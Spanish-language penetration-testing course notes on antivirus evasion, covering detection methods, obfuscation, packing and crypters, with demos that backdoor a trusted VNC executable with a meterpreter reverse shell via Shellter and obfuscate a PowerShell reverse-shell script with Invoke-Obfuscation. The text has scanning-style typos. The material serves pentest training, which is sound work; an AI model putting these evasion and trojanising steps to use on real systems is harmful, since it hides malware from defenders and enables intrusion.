Obfuscation

AV Evasion & Obfuscation

AV Evasion With Shellter

En este modulo se vera la forma de evadir soluciones de antivirus basados en firmas.

Defense Evasion

La evasión de defensa consiste en técnicas que utilizan los adversarios para evitar ser detectados durante el ataque. Las técnicas utilizadas para la evasión de defensa incluyen la desinstalación o desactivación del software de seguridad o la ofuscación o encriptación de datos y scripts. Los adversarios también aprovechan y abusan de los procesos confiables para ocultar y enmascarar su malware. — MITRE

AV Detection Methods

El software antivirus normalmente utiliza detección basada en firmas, heurística y comportamiento.

Siqnature based detection: Una firma de antivirus es una secuencia única de bytes que identifica de forma única el malware. Como resultado, deberá asegurarse de que su exploit o carga útil ofuscada no coincida con ninguna firma conocida en la base de datos de antivirus.

Podemos eludir la detección basada en firmas modificando la secuencia de bytes del malware, cambiando así la firma.

Heuristic-based detection: Se basa en reglas o decisiones para determinar si un binario es malicioso. También busca patrones específicos dentro del código o las llamadas del programa.
Behavior based detection: Se basa en la identificación del malware mediante el monitoreo de su comportamiento. (Se utiliza para las nuevas cepas de malware)

AV Evasion Techniques

On-disk Evasion Techniques

Obfuscation: La ofuscación se refiere al proceso de ocultar algo importante, valioso o crítico. La ofuscación reorganiza el código para dificultar su análisis o RE.
Encoding: La codificación de datos es un proceso que implica cambiar los datos a un nuevo formato mediante un esquema. La codificación es un proceso reversible; los datos se pueden codificar a un nuevo formato y decodificar a su formato original.
Packing: Genera un ejecutable con una nueva estructura binaria con un tamaño más pequeño y, por lo tanto, proporciona a la carga útil una nueva firma.
Crypters: Cifran el código o las cargas útiles y descifran el código cifrado en la memoria. La clave o función de descifrado generalmente se almacena en un stub.

Técnicas de evasión en memoria Se centra en la manipulación de la memoria y no escribe archivos en el disco. • Inyecta la carga útil en un proceso aprovechando varias API de Windows. Luego, la carga útil se ejecuta en la memoria en un subproceso independiente.

In-Memory Evasion Techniques

Se centra en la manipulación de la memoria y no escribe archivos en el disco.
Inyecta la carga útil en un proceso aprovechando varias API de Windows.
Luego, la carga útil se ejecuta en la memoria en un subproceso independiente.

Demo: AV Evasion With Shellter

ShellterShellter

sudo apt-get install shell ter -y
sudo apt-get install wine32

cd /usr/share/windows-resources/shellter
sudo wine shellter.exe

# Pude copiar un ejecutable de confianza como lo es VNC
# Kali tiene binarios de windows que puede utilizar
/usr/share/windows-binaries/

sudo wine shellter.exe
Choose Operation Mode - Auto/Manua1 (A/M/H): A
PE Target: / home/ka1i/Desktop/AVBypass/vncviewer.exe
Enable Stealth Mode? (Y/N/H): y 
Use a listed payload or custom? (L/C/H): L
Select payload by index: 1

SET LHOST: 10. 10. 10.10
SET LPORT: 1234

# Remplazara el ejecutable que se especifico

# Transferir el ejecutable al objetivo
sudo python3 -m http.server 80
# Metasploit escucha
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > run
# Ejecutar el ejecutable desde el objetivo y tendremos conexion

Quiz: AV Evasion With Shellter

Obfuscating PowerShell Code

Obfuscation

La ofuscación se refiere al proceso de ocultar algo importante, valioso o crítico. La ofuscación reorganiza el código para dificultar su análisis o RE.

Como evaluador de penetración, trabajará con código PowerShell con frecuencia. La mayoría de las soluciones de antivirus marcarán inmediatamente el código PowerShell malicioso, por lo que debe poder ofuscar/codificar su código y scripts de PowerShell para evitar su detección.

Invoke-Obfuscation

Invoke-Obfuscation es un ofuscador de comandos y scripts de PowerShell compatible con PowerShell v2.O+ de código abierto.

Repositorio de GitHub: https://qithub.com/danielbohannon/Invoke-Obfuscation

Demo: Obfuscating PowerShell Code

sudo apt-get install powershell -y
#Claonar  el repositorio
# Ingresar al respositorio
pwsh 
Import-Module . / Invoke-Obfuscation. psdl

Invoke-Obfuscation> SET SCRIPTPATH /home/ka1i/Desktop/AVBypass/shell.ps1
Invoke-Obfuscation> ENCODING
Invoke-0bfuscation\Encoding> ASCII
Invoke-Obfuscation\Encoding> 1

# Puede resetear todos los comandos aplciados
Invoke-Obfuscation> SET SCRIPTPATH /home/ka1i/Desktop/AVBypass/shell.ps1
Invoke-0bfuscation\Encoding> RESET
Invoke-0bfuscation\Encoding> BACK

# Aplicamos otro metodo de ofuscacion

Invoke-Obfuscation> AST
Invoke-0bfuscation\AST> ALL
Invoke-Obfuscation\AST\ALL> 1

# Transferir el script al objetivo
$ nc -nvlp 1234
$ sudo python3 -m http. server 80

# En el sistema windwos descargar el powershell ofuscado

Quiz: Obfuscating PowerShell Code

PreviousLinux NextHost & Network Penetration Testing: Post-Exploitation

Last updated 10 months ago